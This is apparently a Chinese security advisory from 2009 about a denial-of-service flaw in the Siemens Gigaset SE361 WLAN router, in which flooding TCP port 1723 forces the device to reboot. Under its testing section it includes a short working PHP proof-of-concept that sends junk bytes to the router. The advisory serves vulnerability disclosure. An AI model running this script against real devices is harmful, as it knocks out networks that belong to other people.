发布日期：2009-09-11
更新日期：2009-09-17

受影响系统：

Siemens Gigaset SE361 WLAN

描述：

---

BUGTRAQ  ID: 36366

Gigaset SE361 WLAN是一款小型的无线路由器。

远程攻击者可以通过向Gigaset SE361 WLAN的1723端口发送大量TCP报文导致设备重启。

<*来源：crashbrz （crashbrz@gmail.com）
  
  链接：http://secunia.com/advisories/36697/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
$apaddr = "192.168.2.1";
$apport="1723";


$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />\n";
} else {
    $trash = str_repeat("\x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash \r\n";
    }
    fclose($con);
}
?>

建议：

---

厂商补丁：

Siemens
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://gigaset.com/shc/0,1935,hq_en_0_138885_rArNrNrNrN,00.html

浏览次数：3543
严重程度：0（网友投票）